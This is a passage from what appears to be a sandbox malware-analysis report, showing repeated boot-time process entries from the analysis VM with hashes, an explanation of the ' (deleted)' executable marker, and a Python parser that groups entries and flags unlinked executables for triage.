              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Start time (UTC):18:49:44
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Start time (UTC):18:49:44
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Start time (UTC):18:49:45
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd (deleted)
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Start time (UTC):18:49:46
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd (deleted)
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Start time (UTC):18:49:46
              Start date (UTC):02/04/2025
              Path:/bin/plymouth
              Arguments:/bin/plymouth quit
              File size:51352 bytes
              MD5 hash:87003efd8dad470042f5e75360a8f49f
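Every entry in this stretch of the process list belongs to the analysis VM's own boot-time activity (systemd, Ubuntu's gpu-manager and plymouth), repeated many times with identical path, size and hash; none of it is the submitted sample. The one detail worth reading is the " (deleted)" suffix on the systemd path: it is the kernel's /proc/<pid>/exe marker for a process whose executable has been unlinked since it started. On a real host that is exactly what a self-deleting implant looks like (compare the "Sample deletes itself" signature in the overview), but here the unlinked binary carries the same size and MD5 in every entry, which most likely reflects the image's systemd package being replaced on disk after boot rather than anything the sample did. The parser below is an added example written for this report, not Joe Sandbox code: it reads this blank-line-separated "Key:Value" layout, collapses repeated entries by (path, MD5), lists which processes ran from an unlinked executable, and flags any path seen with more than one hash, the pattern a replaced binary would produce. The embedded SAMPLE reproduces three entries from the listing above; the function names and the `multiple_hashes` flag are this example's own.

```python
"""Parse a flattened sandbox process listing (blank-line separated 'Key:Value' blocks),
flag executables listed with a ' (deleted)' suffix, and collapse repeated entries by
(path, md5). Added example for this report, not Joe Sandbox code."""
from collections import Counter, defaultdict
from dataclasses import dataclass

DELETED_SUFFIX = " (deleted)"
_KEYS = {"start time (utc)": "start_time", "start date (utc)": "start_date", "path": "path",
         "arguments": "arguments", "file size": "file_size", "md5 hash": "md5"}


@dataclass(frozen=True)
class ProcessRecord:
    start_time: str
    start_date: str
    path: str           # path with any " (deleted)" suffix removed
    exe_deleted: bool   # True when the process ran from an unlinked executable
    arguments: str
    file_size: int
    md5: str


def _parse_block(lines):
    """One block of 'Key:Value' lines -> ProcessRecord, or None if path/md5 are missing."""
    fields = {}
    for line in lines:
        key, sep, value = line.partition(":")  # first colon only: times contain colons
        if sep and key.strip().lower() in _KEYS:
            fields[_KEYS[key.strip().lower()]] = value.strip()
    if "path" not in fields or "md5" not in fields:
        return None
    raw = fields["path"]
    deleted = raw.endswith(DELETED_SUFFIX)
    return ProcessRecord(
        start_time=fields.get("start_time", ""),
        start_date=fields.get("start_date", ""),
        path=raw[:-len(DELETED_SUFFIX)] if deleted else raw,
        exe_deleted=deleted,
        arguments=fields.get("arguments", ""),
        file_size=int(fields.get("file_size", "0").split()[0]),  # "1620224 bytes" -> 1620224
        md5=fields["md5"].lower(),
    )


def parse_process_list(text):
    """Split the listing on blank lines and parse each block; indentation is ignored."""
    records, block = [], []
    for line in text.splitlines() + [""]:  # trailing "" flushes the last block
        if line.strip():
            block.append(line.strip())
        elif block:
            rec = _parse_block(block)
            if rec is not None:
                records.append(rec)
            block = []
    return records


def summarize(records):
    """Group by (path, md5): count, runs from an unlinked executable, distinct argument
    strings, and whether the same path was ever seen with another hash (replaced binary)."""
    groups = defaultdict(lambda: {"count": 0, "deleted": 0, "args": set()})
    for r in records:
        g = groups[(r.path, r.md5)]
        g["count"] += 1
        g["deleted"] += int(r.exe_deleted)
        g["args"].add(r.arguments)
    hashes_per_path = Counter(path for path, _ in groups)
    for (path, _), g in groups.items():
        g["multiple_hashes"] = hashes_per_path[path] > 1
    return dict(groups)


def deleted_executables(records):
    """Sorted distinct paths whose executable was no longer on disk when sampled."""
    return sorted({r.path for r in records if r.exe_deleted})


# Constructed sample input: three entries copied from the listing above, same layout.
SAMPLE = """\
              Start time (UTC):18:49:39
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd (deleted)
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Start time (UTC):18:49:39
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:/usr/bin/gpu-manager --log /var/log/gpu-manager.log
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Start time (UTC):18:49:39
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761
"""

if __name__ == "__main__":
    for (path, md5), g in summarize(parse_process_list(SAMPLE)).items():
        print(f"{g['count']}x {path} md5={md5} unlinked={g['deleted']} args={sorted(g['args'])}")
```

Run against the full report text the same way (paste the whole process section into `parse_process_list`); the grouped output turns the dozens of identical gpu-manager lines into two rows and leaves only the unlinked systemd and, further up the report, the sample's own processes to look at. A group whose `multiple_hashes` is set, or a `deleted` count on a path that is not a known package-managed binary, is what deserves follow-up on a real host.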